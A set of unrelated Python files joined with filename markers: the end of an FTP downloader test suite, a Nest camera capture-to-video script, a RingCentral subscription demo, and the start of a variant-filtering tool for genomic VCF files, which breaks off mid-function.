self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'a/testfile2.txt'),
os.path.join(dir_path, 'a/testfile2.txt'), shallow=False))
def test_download(self):
""" test the download of a small simple file using download"""
if os.path.exists(os.path.join(self._results_dir, 'testfile.txt')):
os.remove(os.path.join(self._results_dir, 'testfile.txt'))
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=False)
ftp.download('testfile.txt', self._results_dir)
self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
def test_broken_tls(self):
""" test correct response if server does not support tls """
if os.path.exists(os.path.join(self._results_dir, 'testfile.txt')):
os.remove(os.path.join(self._results_dir, 'testfile.txt'))
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=False, enable_tls=True)
try:
ftp.download('testfile.txt', self._results_dir)
except ftplib.error_perm, e:
self.assertEqual(str(e), '500 Command "AUTH" not understood.')
@unittest.skip("not implemented")
def test_bad_server_address(self):
""" test the handling of a bad server url """
pass
@unittest.skip("not implemented")
def test_bad_credentials(self):
""" test the handling of a bad server username password """
pass
@unittest.skip("not implemented")
def test_bad_remote_path(self):
""" test the handling of a bad remote path """
pass
@unittest.skip("not implemented")
def test_bad_local_path(self):
""" test the handling of a bad local path """
pass
@unittest.skip("not implemented")
def test_local_path_is_directory(self):
""" test the handling of local_path is a directory """
pass
def test_kill_speed(self):
""" test that kill_speed does not crash """
# abort the download after 2 blocks have been downloaded
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=True)
ftp.download('testfile.txt', self._results_dir)
self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
def test_resume_aborted_download(self):
""" test the handling of resuming a previously aborted download """
self._blocks_downloaded = 0
def on_refresh_display(ftp_download_manager, blockmap, _remote_filepath):
""" on refresh display handler """
self._blocks_downloaded = self._blocks_downloaded + 1
# make sure statistics do not crash
blockmap.get_statistics()
if self._blocks_downloaded > 2:
ftp_download_manager.abort_download()
# abort the download after 2 blocks have been downloaded
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=True)
ftp.on_refresh_display = on_refresh_display
ftp.download('testfile.txt', self._results_dir)
self.assertFalse(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
# resume the download
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=False)
ftp.download('testfile.txt', self._results_dir)
self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
def test_resume_aborted_download2(self):
""" test the handling of resuming a previously aborted download with a blocksize change"""
self._blocks_downloaded = 0
def on_refresh_display(ftp_download_manager, blockmap, _remote_filepath):
""" on refresh display handler """
self._blocks_downloaded = self._blocks_downloaded + 1
# make sure statistics do not crash
blockmap.get_statistics()
if self._blocks_downloaded > 2:
ftp_download_manager.abort_download()
# abort the download after 2 blocks have been downloaded with a blocksize of 65536
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=65536, kill_speed=0, clean=True)
ftp.on_refresh_display = on_refresh_display
ftp.download('testfile.txt', self._results_dir)
self.assertFalse(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
# resume the download
ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
initial_blocksize=1048576, kill_speed=0, clean=False)
ftp.download('testfile.txt', self._results_dir)
self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
|
foggycam.py | """FoggyCam captures Nest camera images and generates a video."""
from urllib.request import urlopen
import pickle
import urllib
import json
from http.cookiejar import CookieJar
import os
from collections import defaultdict
import traceback
from subprocess import Popen, PIPE
import uuid
import threading
import time
from datetime import datetime
import subprocess
from azurestorageprovider import AzureStorageProvider
import shutil
class FoggyCam(object):
"""FoggyCam client class that performs capture operations."""
nest_username = ''
nest_password = ''
nest_user_id = ''
nest_access_token = ''
nest_access_token_expiration = ''
nest_current_user = None
nest_session_url = 'https://home.nest.com/session'
nest_user_url = 'https://home.nest.com/api/0.1/user/#USERID#/app_launch'
nest_api_login_url = 'https://webapi.camera.home.nest.com/api/v1/login.login_nest'
nest_image_url = 'https://nexusapi-us1.camera.home.nest.com/get_image?uuid=#CAMERAID#&width=#WIDTH#&cachebuster=#CBUSTER#'
nest_verify_pin_url = 'https://home.nest.com/api/0.1/2fa/verify_pin'
nest_user_request_payload = {
"known_bucket_types":["quartz"],
"known_bucket_versions":[]
}
nest_camera_array = []
nest_camera_buffer_threshold = 50
is_capturing = False
cookie_jar = None
merlin = None
temp_dir_path = ''
local_path = ''
def __init__(self, username, password):
self.nest_password = password
self.nest_username = username
self.cookie_jar = CookieJar()
self.merlin = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar))
if not os.path.exists('_temp'):
os.makedirs('_temp')
self.local_path = os.path.dirname(os.path.abspath(__file__))
self.temp_dir_path = os.path.join(self.local_path, '_temp')
# It's important to try and load the cookies first to check
# if we can avoid logging in.
try:
self.unpickle_cookies()
utc_date = datetime.utcnow()
utc_millis_str = str(int(utc_date.timestamp())*1000)
self.initialize_twof_session(utc_millis_str)
except:
print ("Failed to re-use the cookies. Re-initializing session...")
self.initialize_session()
self.login()
self.initialize_user()
def unpickle_cookies(self):
"""Get local cookies and load them into the cookie jar."""
print ("Unpickling cookies...")
with open("cookies.bin", 'rb') as f:
pickled_cookies = pickle.load(f)
for pickled_cookie in pickled_cookies:
self.cookie_jar.set_cookie(pickled_cookie)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
self.nest_access_token = cookie_data["cztoken"]
def pickle_cookies(self):
"""Store the cookies locally to reduce auth calls."""
print ("Pickling cookies...")
pickle.dump([c for c in self.cookie_jar], open("cookies.bin", "wb"))
def initialize_twof_session(self, time_token):
"""Creates the first session to get the access token and cookie, with 2FA enabled."""
print ("Intializing 2FA session...")
target_url = self.nest_session_url + "?=_" + time_token
print (target_url)
try:
request = urllib.request.Request(target_url)
request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
response = self.merlin.open(request)
session_data = response.read()
session_json = json.loads(session_data)
self.nest_access_token = session_json['access_token']
self.nest_access_token_expiration = session_json['expires_in']
self.nest_user_id = session_json['userid']
self.pickle_cookies()
except urllib.request.HTTPError as err:
print (err)
def initialize_session(self):
"""Creates the first session to get the access token and cookie."""
print ('INFO: Initializing session...')
payload = {'email':self.nest_username, 'password':self.nest_password}
binary_data = json.dumps(payload).encode('utf-8')
request = urllib.request.Request(self.nest_session_url, binary_data)
request.add_header('Content-Type', 'application/json')
try:
response = self.merlin.open(request)
session_data = response.read()
session_json = json.loads(session_data)
self.nest_access_token = session_json['access_token']
self.nest_access_token_expiration = session_json['expires_in']
self.nest_user_id = session_json['userid']
print ('INFO: [PARSED] Captured authentication token:')
print (self.nest_access_token)
print ('INFO: [PARSED] Captured expiration date for token:')
print (self.nest_access_token_expiration)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
for cookie in cookie_data:
print (cookie)
print ('INFO: [COOKIE] Captured authentication token:')
print (cookie_data["cztoken"])
except urllib.request.HTTPError as err:
if err.code == 401:
error_message = err.read()
unauth_content = json.loads(error_message)
if unauth_content["status"].lower() == "verification_pending":
print ("Pending 2FA verification!")
two_factor_token = unauth_content["2fa_token"]
phone_truncated = unauth_content["truncated_phone_number"]
print ("Enter PIN you just received on number ending with", phone_truncated)
pin = input()
payload = {"pin":pin ,"2fa_token":two_factor_token}
binary_data = json.dumps(payload).encode('utf-8')
request = urllib.request.Request(self.nest_verify_pin_url, binary_data)
request.add_header('Content-Type', 'application/json')
try:
response = self.merlin.open(request)
pin_attempt = response.read()
parsed_pin_attempt = json.loads(pin_attempt)
if parsed_pin_attempt["status"].lower() == "id_match_positive":
print ("2FA verification successful.")
utc_date = datetime.utcnow()
utc_millis_str = str(int(utc_date.timestamp())*1000)
print ("Targetting new session with timestamp: ", utc_millis_str)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
print ('INFO: [COOKIE] Captured authentication token:')
print (cookie_data["cztoken"])
self.nest_access_token = parsed_pin_attempt['access_token']
self.initialize_twof_session(utc_millis_str)
else:
print ("Could not verify. Exiting...")
exit()
except:
traceback.print_exc()
print ("Failed 2FA checks. Exiting...")
exit()
print ('INFO: Session initialization complete!')
def login(self):
"""Performs user login to get the website_2 cookie."""
print ('INFO: Performing user login...')
post_data = {'access_token':self.nest_access_token}
post_data = urllib.parse.urlencode(post_data)
binary_data = post_data.encode('utf-8')
print ("INFO: Auth post data")
print (post_data)
request = urllib.request.Request(self.nest_api_login_url, data=binary_data)
request.add_header('Content-Type', 'application/x-www-form-urlencoded')
response = self.merlin.open(request)
session_data = response.read()
print (session_data)
def initialize_user(self):
"""Gets the assets belonging to Nest user."""
print ('INFO: Initializing current user...')
user_url = self.nest_user_url.replace('#USERID#', self.nest_user_id)
print ('INFO: Requesting user data from:')
print (user_url)
binary_data = json.dumps(self.nest_user_request_payload).encode('utf-8')
request = urllib.request.Request(user_url, binary_data)
request.add_header('Content-Type', 'application/json')
request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
response = self.merlin.open(request)
response_data = response.read()
print (response_data)
user_object = json.loads(response_data)
for bucket in user_object['updated_buckets']:
bucket_id = bucket['object_key']
if bucket_id.startswith('quartz.'):
camera_id = bucket_id.replace('quartz.', '')
print ('INFO: Detected camera configuration.')
print (bucket)
print ('INFO: Camera UUID:')
print (camera_id)
self.nest_camera_array.append(camera_id)
def capture_images(self, config=None):
"""Starts the multi-threaded image capture process."""
print ('INFO: Capturing images...')
self.is_capturing = True
if not os.path.exists('capture'):
os.makedirs('capture')
self.nest_camera_buffer_threshold = config.threshold
for camera in self.nest_camera_array:
camera_path = ''
video_path = ''
# Determine whether the entries should be copied to a custom path
# or not.
if not config.path:
camera_path = os.path.join(self.local_path, 'capture', camera, 'images')
video_path = os.path.join(self.local_path, 'capture', camera, 'video')
else:
camera_path = os.path.join(config.path, 'capture', camera, 'images')
video_path = os.path.join(config.path, 'capture', camera, 'video')
# Provision the necessary folders for images and videos.
if not os.path.exists(camera_path):
os.makedirs(camera_path)
if not os.path.exists(video_path):
os.makedirs(video_path)
image_thread = threading.Thread(target=self.perform_capture, args=(config, camera, camera_path, video_path))
image_thread.daemon = True
image_thread.start()
while True:
time.sleep(1)
def perform_capture(self, config=None, camera=None, camera_path='', video_path=''):
"""Captures images and generates the video from them."""
camera_buffer = defaultdict(list)
while self.is_capturing:
file_id = str(uuid.uuid4().hex)
utc_date = datetime.utcnow()
utc_millis_str = str(int(utc_date.timestamp())*1000)
print ('Applied cache buster: ', utc_millis_str)
image_url = self.nest_image_url.replace('#CAMERAID#', camera).replace('#CBUSTER#', utc_millis_str).replace('#WIDTH#', str(config.width))
request = urllib.request.Request(image_url)
request.add_header('accept', 'image/webp,image/apng,image/*,*/*;q=0.9')
request.add_header('accept-encoding', 'gzip, deflate, br')
request.add_header('user-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36')
request.add_header('referer','https://home.nest.com/')
request.add_header('authority','nexusapi-us1.camera.home.nest.com')
try:
response = self.merlin.open(request)
time.sleep(5)
with open(camera_path + '/' + file_id + '.jpg', 'wb') as image_file:
for chunk in response:
image_file.write(chunk)
# Check if we need to compile a video
if config.produce_video:
camera_buffer_size = len(camera_buffer[camera])
print ('[', threading.current_thread().name, '] INFO: Camera buffer size for ', camera, ': ', camera_buffer_size)
if camera_buffer_size < self.nest_camera_buffer_threshold:
camera_buffer[camera].append(file_id)
else:
camera_image_folder = os.path.join(self.local_path, camera_path)
# Build the batch of files that need to be made into a video.
file_declaration = ''
for buffer_entry in camera_buffer[camera]:
file_declaration = file_declaration + 'file \'' + camera_image_folder + '/' + buffer_entry + '.jpg\'\n'
concat_file_name = os.path.join(self.temp_dir_path, camera + '.txt')
# Make sure that the content is decoded
with open(concat_file_name, 'w') as declaration_file:
declaration_file.write(file_declaration)
# Check if we have ffmpeg locally
use_terminal = False
ffmpeg_path = ''
if shutil.which("ffmpeg"):
ffmpeg_path = 'ffmpeg'
use_terminal = True
else:
ffmpeg_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', 'tools', 'ffmpeg'))
if use_terminal or (os.path.isfile(ffmpeg_path) and use_terminal is False):
print ('INFO: Found ffmpeg. Processing video!')
target_video_path = os.path.join(video_path, file_id + '.mp4')
process = Popen([ffmpeg_path, '-r', str(config.frame_rate), '-f', 'concat', '-safe', '0', '-i', concat_file_name, '-vcodec', 'libx264', '-crf', '25', '-pix_fmt', 'yuv420p', target_video_path], stdout=PIPE, stderr=PIPE)
process.communicate()
os.remove(concat_file_name)
print ('INFO: Video processing is complete!')
# Upload the video
storage_provider = AzureStorageProvider()
if bool(config.upload_to_azure):
print ('INFO: Uploading to Azure Storage...')
target_blob = 'foggycam/' + camera + '/' + file_id + '.mp4'
storage_provider.upload_video(account_name=config.az_account_name, sas_token=config.az_sas_token, container='foggycam', blob=target_blob, path=target_video_path)
print ('INFO: Upload complete.')
# If the user specified the need to remove images post-processing
# then clear the image folder from images in the buffer.
if config.clear_images:
for buffer_entry in camera_buffer[camera]:
deletion_target = os.path.join(camera_path, buffer_entry + '.jpg')
print ('INFO: Deleting ' + deletion_target)
os.remove(deletion_target)
else:
print ('WARNING: No ffmpeg detected. Make sure the binary is in /tools.')
# Empty buffer, since we no longer need the file records that we're planning
# to compile in a video.
camera_buffer[camera] = []
except urllib.request.HTTPError as err:
if err.code == 403:
self.initialize_session()
self.login()
self.initialize_user()
except Exception:
print ('ERROR: Could not download image from URL:')
print (image_url)
traceback.print_exc()
|
demo_subscription.py | #!/usr/bin/env python
# encoding: utf-8
from multiprocessing import Process
from time import sleep
from ringcentral.subscription import Events
from ringcentral import SDK
from config import USERNAME, EXTENSION, PASSWORD, APP_KEY, APP_SECRET, SERVER
def main():
sdk = SDK(APP_KEY, APP_SECRET, SERVER)
platform = sdk.platform()
platform.login(USERNAME, EXTENSION, PASSWORD)
def on_message(msg):
print(msg)
def pubnub():
try:
s = sdk.create_subscription()
s.add_events(['/account/~/extension/~/message-store'])
s.on(Events.notification, on_message)
s.register()
while True:
sleep(0.1)
except KeyboardInterrupt:
print("Pubnub listener stopped...")
p = Process(target=pubnub)
try:
p.start()
except KeyboardInterrupt:
p.terminate()
print("Stopped by User")
print("Wait for notification...")
if __name__ == '__main__':
main() |
SMuRF.py | #!/usr/bin/python
# Import modules
import vcf as pyvcf
import pysam
import argparse
import multiprocessing as mp
import queue
import time
import sys
import collections
import subprocess
import os
import glob
import pandas as pd
#import matplotlib.pyplot as plt
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as plt
import numpy as np
import re
from sklearn.mixture import GaussianMixture
from matplotlib.backends.backend_pdf import PdfPages
import warnings
import configparser
# Get version from git
#__version__ = subprocess.check_output(["git", "describe"]).strip().decode('UTF-8')
__version__ = 'v2.1.2'
# Set arguments
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Put here a description.')
parser.add_argument('-i', '--input', type=str, help='Input indexed vcf.gz file', required=True)
parser.add_argument('-b', '--bam', action='append', nargs="*", type=str, help='Input bam file', required=True)
parser.add_argument('-n', '--normal', action='append', type=str, help='Normal sample name')
parser.add_argument('-c','--config', default=os.path.dirname(os.path.abspath(__file__))+"/config.ini",type=str,help='Give the full path to your own ini file (default: %(default)s)')
parser.add_argument('-v', '--version', action='version', version=__version__)
args = parser.parse_args()
# Flatten input list of bam files
args.bam = [x for l in args.bam for x in l]
# Set default control None if no control is given at the command line
if not args.normal:
args.normal = [ None ]
cfg = configparser.ConfigParser()
if not os.path.exists(args.config):
sys.stderr.write("Config file "+args.config+" does not exists\n")
sys.exit()
if not args.config == os.path.dirname(os.path.abspath(__file__))+"/config.ini":
cfg.read([os.path.dirname(os.path.abspath(__file__))+"/config.ini", args.config])
else:
cfg.read(args.config)
with open('SMuRF_config.ini', 'w') as configfile:
cfg.write(configfile)
# Read the vcf, fix and add fields to the header
vcf_reader = pyvcf.Reader(filename=args.input, encoding='utf-8')
vcf_name = os.path.basename(args.input)
vcf_name = vcf_name.replace(".vcf.gz","")
# Create tmp directory if it does not exists
try:
os.stat('./SMuRF_tmp')
except:
os.mkdir('./SMuRF_tmp')
# Define global variables
vaf_dict = collections.defaultdict(list)
responsibilities_dict = collections.defaultdict(dict)
contig_list = []
bam_sample_names = collections.defaultdict(dict)
def main():
global vcf_reader, vaf_df, blacklist
vcf_reader = fix_vcf_header(vcf_reader)
vcf_reader = add_vcf_header(vcf_reader)
blacklist = create_blacklist()
for contig in vcf_reader.contigs:
contig_list.append(contig)
# Create an input queue with the contigs and an empty output queue
q = mp.Queue()
q_out = mp.Queue()
for contig in contig_list:
q.put(contig)
# Create number of processes to parse the vcf file
processes = [mp.Process(target=parse_chr_vcf, args=(q, q_out, vcf_reader, args.bam)) for x in range(int(cfg['SMuRF']['threads']))]
for p in processes:
p.start()
liveprocs = list(processes)
while liveprocs:
time.sleep(5)
try:
while 1:
for s,v in q_out.get(block=False, timeout=1).items():
vaf_dict[s].extend(v)
except queue.Empty:
pass
# Give tasks a chance to put more data in
time.sleep(10)
if not q.empty():
continue
liveprocs = [p for p in liveprocs if p.is_alive()]
for p in processes:
p.join()
def parse_chr_vcf(q, q_out, contig_vcf_reader, bams):
"""
Function to parse the vcf per contig.
Write the new record to a vcf file.
Input: Queue object
Input: Queue out object
Input: VCF reader object
Input: List with the bam names
"""
while True:
try:
# Get contig one by one from the queue
contig = q.get(block=False,timeout=1)
contig_vaf = collections.defaultdict(list)
contig_vcf_flag_writer = pyvcf.Writer(open('./SMuRF_tmp/{}_SMuRF.vcf'.format(contig),'w', encoding='utf-8'), contig_vcf_reader)
try:
# Try to parse the specific contig from the vcf
contig_vcf_reader.fetch(contig)
except:
# Skip contig if it is not present in the vcf file
continue
# print( "blacklist", blacklist )
for record in contig_vcf_reader.fetch(contig):
if not record.FILTER:
chr = record.CHROM
chr = chr.lower()
chr = re.sub("chr|chrom", "", chr)
# if (len(record.ALT[0]) > 1):
# check_flanking_indels(record, contig_vcf_reader)
if "MQ" not in record.INFO:
record.FILTER.append("NoMQtag")
elif record.ID and "COSM" not in record.ID:
record.FILTER.append('KnownVariant')
elif record.QUAL < int(cfg['SMuRF']['qual']):
record.FILTER.append('BadQual')
elif len(record.ALT) > 1:
record.FILTER.append('MultiAllelic')
elif record.INFO['MQ'] < int(cfg['SMuRF']['mq']):
record.FILTER.append('BadMQ')
elif chr in blacklist and record.POS in blacklist[chr]:
record.FILTER.append("BlackList")
elif (len(record.ALT[0]) > 1 or len(record.REF) > 1) and not cfg['SMuRF']['indel']:
record.FILTER.append("Indel")
elif sample_quality_control( record ):
for s,v in calculate_vaf( record ).items():
if ( not record.FILTER or record.FILTER == ['NoClonalSample'] ):
contig_vaf[s].append(v)
contig_vcf_flag_writer.write_record(record)
q_out.put( contig_vaf )
# Break the loop if the queue is empty
except queue.Empty:
break
def check_flanking_indels( record, contig_vcf_reader):
for record2 in contig_vcf_reader.fetch(record.CHROM, record.POS-int(cfg['SMuRF']['indel_flank']), record.POS+int(cfg['SMuRF']['indel_flank'])):
if (len(record2.ALT[0]) > 1):
if (record2.CHROM == record.CHROM and record2.POS == record.POS):
continue
for call in (record2.samples):
sample = True
if call.sample in args.normal:
sample = False
if not sample and (call['GT'] == '0/1' or call['GT'] == '1/1' or call['GT'] == '0|1' or call['GT'] == '1|1'):
record.FILTER.append("FlankingControlEvidence")
return( 1 )
return( 1 )
def get_command_line():
"""
Function to get the commandline arguments
Return: A string with the actual command.
"""
cmdline = [sys.argv[0]]
for arg in vars(args):
if type(getattr(args,arg)) is list:
for a in getattr(args,arg):
cmdline.append('--{} {}'.format(arg,str(a)))
else:
cmdline.append('--{} {}'.format(arg,str(getattr(args,arg))))
return( '"{}"'.format(" ".join(cmdline)) )
def fix_vcf_header( vcf_reader ):
"""
Function to fix fields in the vcf header
Input: A vcf reader object
Return: The vcf reader object with fixed headers
"""
#dbNSFP_clinvar_clnsig has a Integer type but sometimes it is a String, e.g. 2|2
vcf_reader.infos['dbNSFP_clinvar_clnsig'] = pyvcf.parser._Info("dbNSFP_clinvar_clnsig",1,"String","Field 'clinvar_clnsig' from dbNSFP", None, None)
#dbNSFP_clinvar_golden_stars has a Integer type but sometimes it is a String, e.g. 0|1
vcf_reader.infos['dbNSFP_clinvar_golden_stars'] = pyvcf.parser._Info("dbNSFP_clinvar_golden_stars",1,"String","Field 'clinvar_golden_stars' from dbNSFP", None, None)
vcf_reader.infos['dbNSFP_hg18_chr'] = pyvcf.parser._Info("dbNSFP_hg18_chr",1,"String","Field 'hg18_chr' from dbNSFP", None, None)
vcf_reader.infos['dbNSFP_hg19_chr'] = pyvcf.parser._Info("dbNSFP_hg19_chr",1,"String","Field 'hg19_chr' from dbNSFP", None, None)
return( vcf_reader )
def add_vcf_header( vcf_reader ):
"""
Function to add a new field to the vcf header
Input: A vcf reader object
Return: The vcf reader object with new headers added
"""
# Metadata
vcf_reader.metadata['SMuRFCmd'] = [get_command_line()]
# Formats
vcf_reader.formats['VAF'] = pyvcf.parser._Format('VAF',None,'Float','Variant Allele Frequency calculated from the BAM file')
vcf_reader.formats['CAD'] = pyvcf.parser._Format('CAD',None,'Integer','Calculated Allelic Depth, used for VAF calculation')
vcf_reader.formats['FT'] = pyvcf.parser._Format('FT',None,'String','Sample filter')
# Filters
vcf_reader.filters['KnownVariant'] = pyvcf.parser._Filter('KnownVariant','Variant has already an ID, excluding COSMIC_IDs')
vcf_reader.filters['BadMQ'] = pyvcf.parser._Filter('BadMQ', 'Variant with MQ <'+str(cfg['SMuRF']['mq']))
vcf_reader.filters['BadQual'] = pyvcf.parser._Filter('BadQual','Variant with a QUAL <'+str(cfg['SMuRF']['qual']))
vcf_reader.filters['MultiAllelic'] = pyvcf.parser._Filter('MultiAllelic', 'Variant has multiple alternative alleles')
vcf_reader.filters['BlackList'] = pyvcf.parser._Filter('BlackList', 'Variant exists in a blacklist')
vcf_reader.filters['Indel'] = pyvcf.parser._Filter('Indel','Variant is an indel')
vcf_reader.filters['ControlEvidence'] = pyvcf.parser._Filter('ControlEvidence','Variant is also found in a control based on the GT')
vcf_reader.filters['NoSampleEvidence'] = pyvcf.parser._Filter('NoSampleEvidence','Variant is not found in any of the samples based on the GT')
vcf_reader.filters['AllSamplesFailedQC'] = pyvcf.parser._Filter('AllSamplesFailedQC', 'All samples failed the quality control')
vcf_reader.filters['AllControlsFailedQC'] = pyvcf.parser._Filter('AllControlsFailedQC', 'All controls failed the quality control')
vcf_reader.filters['ControlSubclonal'] = pyvcf.parser._Filter('ControlSubclonal', 'Variant is found as subclonal in a control based on the recalculated VAF')
vcf_reader.filters['ControlClonal'] = pyvcf.parser._Filter('ControlClonal', 'Variant is found as clonal in a control based on the recalculated VAF')
vcf_reader.filters['NoClonalSample'] = pyvcf.parser._Filter('NoClonalSample', 'Variant is not found as clonal in any of the samples based on the recalculated VAF')
# Sample filters
vcf_reader.filters['LowCov'] = pyvcf.parser._Filter('LowCov', 'Variant has a coverage <'+str(cfg['SMuRF']['coverage'])+' in this sample/control')
vcf_reader.filters['NoGenoType'] = pyvcf.parser._Filter('NoGenoType', 'Genotype is empty for this sample/control')
vcf_reader.filters['isRef'] = pyvcf.parser._Filter('isRef', 'Genotype is a reference (i.e. reference 0/0)')
vcf_reader.filters['isVariant'] = pyvcf.parser._Filter('isVariant', 'Genotype is a variant (i.e. not reference 0/0)')
vcf_reader.filters['LowGQ'] = pyvcf.parser._Filter('LowGQ', 'Variant has a low genome quality for this sample/control')
# Infos
vcf_reader.infos['ABSENT_SAMPLES'] = pyvcf.parser._Info('ABSENT_SAMPLES',1,'Integer','Number of samples without the variant', None, None)
vcf_reader.infos['SUBCLONAL_SAMPLES'] = pyvcf.parser._Info('SUBCLONAL_SAMPLES',1,'Integer','Number of samples with a subclonal variant', None, None)
vcf_reader.infos['CLONAL_SAMPLES'] = pyvcf.parser._Info('CLONAL_SAMPLES',1,'Integer','Number of samples with a clonal variant', None, None)
vcf_reader.infos['ABSENT_CONTROLS'] = pyvcf.parser._Info('ABSENT_CONTROLS',1,'Integer','Number of controls without the variant', None, None)
vcf_reader.infos['SUBCLONAL_CONTROLS'] = pyvcf.parser._Info('SUBCLONAL_CONTROLS',1,'Integer','Number of controls with a subclonal variant', None, None)
vcf_reader.infos['CLONAL_CONTROLS'] = pyvcf.parser._Info('CLONAL_CONTROLS',1,'Integer','Number of controls with a clonal variant', None, None)
vcf_reader.infos['ABSENT_SAMPLE_NAMES'] = pyvcf.parser._Info('ABSENT_SAMPLE_NAMES',None,'String','Samples without the variant', None, None)
vcf_reader.infos['SUBCLONAL_SAMPLE_NAMES'] = pyvcf.parser._Info('SUBCLONAL_SAMPLE_NAMES',None,'String','Samples with a subclonal variant', None, None)
vcf_reader.infos['CLONAL_SAMPLE_NAMES'] = pyvcf.parser._Info('CLONAL_SAMPLE_NAMES',None,'String','Samples with a clonal variant', None, None)
vcf_reader.infos['ABSENT_CONTROL_NAMES'] = pyvcf.parser._Info('ABSENT_CONTROL_NAMES',None,'String','Controls without the variant', None, None)
vcf_reader.infos['SUBCLONAL_CONTROL_NAMES'] = pyvcf.parser._Info('SUBCLONAL_CONTROL_NAMES',None,'String','Controls with a subclonal variant', None, None)
vcf_reader.infos['CLONAL_CONTROL_NAMES'] = pyvcf.parser._Info('CLONAL_CONTROL_NAMES',None,'String','Controls with a clonal variant', None, None)
vcf_reader.infos['PASS_QC_SAMPLES'] = pyvcf.parser._Info('PASS_QC_SAMPLES',1,'Integer','Number of samples which pass all quality control filters', None, None)
vcf_reader.infos['PASS_QC_CONTROLS'] = pyvcf.parser._Info('PASS_QC_CONTROLS',1,'Integer','Number of controls which pass all quality control filters', None, None)
vcf_reader.infos['FAIL_QC_SAMPLES'] = pyvcf.parser._Info('FAIL_QC_SAMPLES',1,'Integer','Number of samples which failed one or multiple quality control filters', None, None)
vcf_reader.infos['FAIL_QC_CONTROLS'] = pyvcf.parser._Info('FAIL_QC_CONTROLS',1,'Integer','Number of controls which failed one or multiple quality control filters', None, None)
vcf_reader.infos['PASS_QC_SAMPLE_NAMES'] = pyvcf.parser._Info('PASS_QC_SAMPLE_NAMES',None,'String','Samples which pass all quality control filters', None, None)
vcf_reader.infos['PASS_QC_CONTROL_NAMES'] = pyvcf.parser._Info('PASS_QC_CONTROL_NAMES',None,'String','Controls which pass all quality control filters', None, None)
vcf_reader.infos['FAIL_QC_SAMPLE_NAMES'] = pyvcf.parser._Info('FAIL_QC_SAMPLE_NAMES',None,'String','Samples which failed one or multiple quality control filters', None, None)
vcf_reader.infos['FAIL_QC_CONTROL_NAMES'] = pyvcf.parser._Info('FAIL_QC_CONTROL_NAMES',None,'String','Controls which failed one or multiple quality control filters', None, None)
return( vcf_reader )
def get_sample_name( bamfile ):
"""
Function to get the sample name from the bam file
Input: An AlignmentFile object of the bam file
Return: The sample or False if there is no SM tag in the bam header
"""
header = bamfile.header
sample_name = False
if 'RG' in header:
if type(header['RG']) is list:
sample_name = header['RG'][0]['SM']
else:
sample_name = header['RG']['SM']
return( sample_name )
def check_pileupread( pileupread ):
"""
Function to check a pileup read.
Returns True if the read needs to be kept and returns False if read can be skipped.
Input: Pileupread object
Return: True or False
"""
check = True
if pileupread.alignment.is_duplicate:
check = False
elif pileupread.is_del:
check = False
elif pileupread.is_refskip:
check = False
elif not pileupread.query_position:
check = False
elif pileupread.alignment.mapq < int(cfg['SMuRF']['mapq']):
check = False
elif pileupread.alignment.query_qualities[pileupread.query_position] < int(cfg['SMuRF']['base_phred_quality']):
check = False
return( check )
def update_call_data( call, edit_keys, edit_values, vcf_reader ):
"""
Function to add or update a field to the format field.
This will be automatically update in the call object
Input: A call object
Input: A list with format fields
Input: A list with format values
"""
f_keys = list(vcf_reader.formats.keys())
d = dict(call.data._asdict())
f_vals = []
for key in f_keys:
if key in edit_keys:
f_vals.append(edit_values[edit_keys.index(key)] )
elif key in d:
f_vals.append(d[key] )
else:
f_vals.append(None)
handy_dict = dict(zip(f_keys, f_vals))
f_keys.remove('GT')
f_keys.insert(0,'GT')
call.data = collections.namedtuple('CallData',f_keys)(**handy_dict)
def gmm( X ):
"""
Function to fit a GMM model with two components
Input: Array with VAF values
Return: x values
Return: List with probability values for all components
Return: List with probability values of each component
Return: List of the means of each component
Return: List of standard deviations of each component
"""
X = np.array(X)
X = np.reshape(X, [len(X), 1])
# ------------------------------------------------------------
# Learn the best-fit GMM models
